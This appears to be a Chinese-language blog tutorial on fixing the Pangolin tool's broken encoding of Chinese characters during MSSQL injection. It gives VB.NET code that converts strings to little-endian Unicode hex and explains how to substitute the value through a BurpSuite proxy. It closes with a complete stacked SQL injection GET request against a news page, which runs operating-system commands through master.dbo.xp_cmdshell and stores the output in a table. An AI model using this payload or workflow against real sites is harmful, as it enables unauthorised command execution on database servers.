Pangolin注入mssql时对中文字符的处理方法

previous page next page
dir c:\中文路径”这种cmd命令执行总是出错,后来用BurpSuite对发送的数据包进行分析,发现Pangolin使用了一种类似URLEncode 的编码方式对中文进行编码

如“中文路径”被其编码成为:

  1. 0xd600d000ce00c400c200b700be00b600  

很明显,这里每个中文字符被拆分成了两个双字节且均以00结尾,不符合Unicode的规则,如果是Unicode编码的话,每个中文应当占用2个字节,不应有00出现。

看来Pangolin对中文的处理有问题,不过我没办法修改它的二进制代码,只能自己做一个编码程序,然后配合BurpSuite把渗透测试工作执 行下去。下面是处理编码的一个小程序中的核心代码,在Visual Basic 2010 Express Edition编译通过。

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim strOut As String = ""
        For i = 1 To Len(TextBox1.Text)  '逐个遍历传入的字符
            Dim strChar As String = ""
            strChar = Hex(AscW(Mid(TextBox1.Text, i, 1)))  '将当前字符转为16进制表示的Unicode编码
            If Len(strChar) = 2 Then     '如果是ASCII字符,在其后加上00
                strChar = strChar + "00"
            Else
                strChar = Mid(strChar, 3, 2) + Mid(strChar, 1, 2)   '将该编码高低位互换(否则MSSQL解析错误)
            End If
            strOut = strOut + strChar
        Next
        TextBox2.Text = "0x" + strOut.ToLower
End Sub

使用该程序对汉字“中文路径”进行编码后,结果如下:

  1. 0x2d4e8765ef8d845f  

在Pangolin中设置BurpSuite代理,使用BurpSuite把Pangolin发送的数据包中@z=??的问号部分替换为自己计算的字符编码即可得到想要的结果。

  1. GET /news_detail.aspx?newsid=3941%20;declare%20@z%20nvarchar(4000)%20set%20@z=??%20insert%20into%20[pangolin_test_table](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[pangolin_test_table]%20add%20id%20int%20not%20null%20identity%20(1,1)-- HTTP/
     
previous page start next page